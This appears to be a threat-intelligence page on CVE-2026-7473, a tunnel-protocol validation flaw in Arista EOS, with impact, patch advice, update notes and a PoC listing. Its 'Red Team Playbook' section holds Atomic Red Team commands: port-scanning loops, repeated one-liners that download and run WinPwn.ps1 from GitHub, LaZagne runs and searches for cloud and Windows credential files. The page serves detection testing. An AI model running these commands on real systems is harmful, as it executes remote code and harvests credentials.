CVE-2026-7473
Overview
This vulnerability is a protocol decapsulation validation flaw affecting Arista Networks EOS tunnel processing components. Specifically, the switch fails to verify the tunnel protocol type when decapsulating packets on VXLAN, decap-groups, or GRE tunnel interfaces. This improper validation causes the device to incorrectly process tunneled packets with a destination IP matching its configured decapsulation IP regardless of the actual tunnel protocol, leading to unintended packet forwarding behavior.
Vulnerability Description
On affected platforms running Arista EOS where a tunnel decapsulation configuration—such as VXLAN (Virtual Extensible LAN), decap-groups, or a GRE (Generic Routing Encapsulation) tunnel interface—is present, the switch will incorrectly decapsulate and forward other unexpected tunneled packet with a destination IP matching its configured decapsulation IP. This occurs because the switch does not verify the tunnel protocol type, potentially leading to the unexpected processing of non-configured tunnel traffic. This issue has been reported as being exploited in the wild.
Impact
An unauthenticated attacker capable of sending tunneled packets to the switch’s decapsulation IP can cause the device to process and forward unexpected tunneled traffic. This may allow interception or redirection of network traffic, potentially facilitating lateral movement or unauthorized data exposure within the network. The attacker does not require any privileged access or user interaction to exploit this vulnerability, increasing the risk of exploitation in operational environments where tunnel decapsulation is configured.
Solution
Arista Networks has released Security Advisory 0137 addressing this issue. Users should upgrade affected EOS versions as detailed in the advisory available at https://www.arista.com/en/support/advisories-notices/security-advisory/22872-security-advisory-0137. The advisory provides specific patched EOS versions and recommended configuration changes to mitigate the vulnerability. Administrators are advised to follow the vendor’s instructions precisely to ensure complete remediation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question arises from a flaw in the decapsulation process of specific networking devices running Arista EOS. In environments where tunnel decapsulation configurations, such as VXLAN or GRE tunnel interfaces, are utilized, the affected switches fail to adequately verify the tunnel protocol type before processing incoming packets. This oversight allows the switch to incorrectly decapsulate and forward packets that do not conform to the expected tunnel protocol, particularly when these packets have a destination IP that matches the switch's configured decapsulation IP. The lack of stringent protocol verification creates a significant risk, as it opens the door to unintended packet processing, potentially leading to unauthorized access or data leakage.
Exploitation of this vulnerability can occur through various attack vectors. An adversary could craft malicious packets that mimic legitimate tunneled traffic, targeting the switch's decapsulation configuration. By sending these packets with a destination IP that the switch recognizes, the attacker can manipulate the device into processing and forwarding unexpected traffic. This could be executed from within the same network segment, making it particularly insidious, as it may not require external access. Furthermore, if the attacker has knowledge of the network topology and the specific configurations in use, the likelihood of successful exploitation increases significantly.
The real-world impact of this vulnerability is profound, particularly for organizations relying on Arista EOS for their networking infrastructure. The potential for unauthorized packet processing can lead to various business risks, including data breaches, service disruptions, and compliance violations. For instance, sensitive information could be inadvertently exposed to unauthorized users, or critical services could be disrupted by the misrouting of traffic. The exploitation of this vulnerability has been reported in the wild, underscoring the urgency for organizations to assess their exposure and implement necessary safeguards. The financial and reputational repercussions of a successful attack could be substantial, especially in industries where data integrity and confidentiality are paramount.
To detect and mitigate the risks associated with this vulnerability, organizations should adopt a multi-faceted approach. Regular network traffic analysis can help identify unusual patterns that may indicate exploitation attempts. Implementing strict access controls and segmentation can limit the potential attack surface, making it more difficult for an adversary to exploit the vulnerability. Additionally, keeping the networking devices updated with the latest firmware and patches is crucial, as vendors often release updates to address known vulnerabilities. Organizations should also consider employing intrusion detection systems (IDS) that can monitor for anomalous traffic patterns indicative of exploitation attempts.
In conclusion, the vulnerability in the decapsulation process of Arista EOS presents a significant threat to network security. Its potential for exploitation through crafted packets poses serious risks to data integrity and network reliability. Organizations must remain vigilant, employing robust detection and mitigation strategies to safeguard their infrastructure against this and similar vulnerabilities. By prioritizing proactive security measures and maintaining an ongoing assessment of their network configurations, businesses can better protect themselves from the evolving landscape of cyber threats.
CSURFACE threat intelligence has identified a marked escalation in activity related to CVE-2026-7473, highlighted by the emergence of a publicly available proof-of-concept exploit on GitHub. This development signals a shift from theoretical risk to practical exploitation, increasing the likelihood of adversaries leveraging the vulnerability in operational environments. Concurrently, the inclusion of this vulnerability in the CISA Known Exploited Vulnerabilities (KEV) catalog underscores its elevated priority for remediation efforts across critical infrastructure sectors. Our telemetry indicates a significant uptick in detection events consistent with exploitation attempts, reflecting growing attacker interest and capability. The Exploit Prediction Scoring System (EPSS) score has surged substantially, reinforcing the heightened risk posture. Collectively, these factors elevate the threat level from medium to a more urgent concern, necessitating increased attention from defenders to monitor for exploitation indicators and reassess risk management strategies accordingly.
Update 2 — June 22, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2026-7473, with our telemetry indicating a significant uptick in attempts to exploit the tunnel decapsulation vulnerability on Arista EOS platforms. This surge reflects growing adversary interest, likely driven by the availability of new proof-of-concept exploits circulating publicly. Although the EPSS score remains low and trending downward, the increased detection frequency underscores a widening attack surface and suggests that threat actors are actively probing networks for this weakness. The absence of confirmed ransomware usage at this stage does not preclude potential future incorporation into broader attack chains. Consequently, this development elevates the operational risk associated with CVE-2026-7473, warranting heightened vigilance from defenders as exploitation attempts become more frequent and sophisticated.
Update 3 — July 08, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2026-7473, reflecting a growing interest among threat actors in exploiting the tunnel decapsulation vulnerability on Arista EOS platforms. Although the EPSS score remains low and stable, the increase in telemetry signals a broader reconnaissance effort and more frequent probing attempts targeting the misconfiguration of tunnel protocol verification. This shift indicates that adversaries are refining their tactics to bypass existing controls by leveraging the protocol-agnostic decapsulation flaw, potentially enabling unauthorized traffic forwarding or lateral movement within affected networks. While no direct ransomware linkage has been confirmed, the heightened probing activity elevates the operational risk, suggesting that this vulnerability could become a vector in multi-stage intrusion campaigns. Defenders should interpret this trend as an early warning of increasing exploitation attempts, necessitating closer monitoring of tunnel interface behaviors and network traffic anomalies to detect subtle exploitation indicators.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Arista | Eos | All |
cpe:2.3:o:arista:eos:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
fevar54/CVE-2026-7473---Arista-EOS-Tunnel-Decapsulation-Bypass
Vulnerability: On affected Arista EOS platforms with tunnel decapsulation
|
fevar54 | 1 | 0 | 2026-06-10 | View |
Threat Feed
9 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Active exploitation confirmed — vendor: Arista, product: Extensible Operating System
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-7473 |
| arista.com |
GitHub CVE
vendor-advisory
|
https://www.arista.com/en/support/advisories-notices/security-advisory/22872-security-advisory-0137 |
| arista.com |
NVD API
Vendor Advisory
Mitigation
|
https://www.arista.com/en/support/advisories-notices/security-advisory/24005-security-advisory-0137 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-7473 |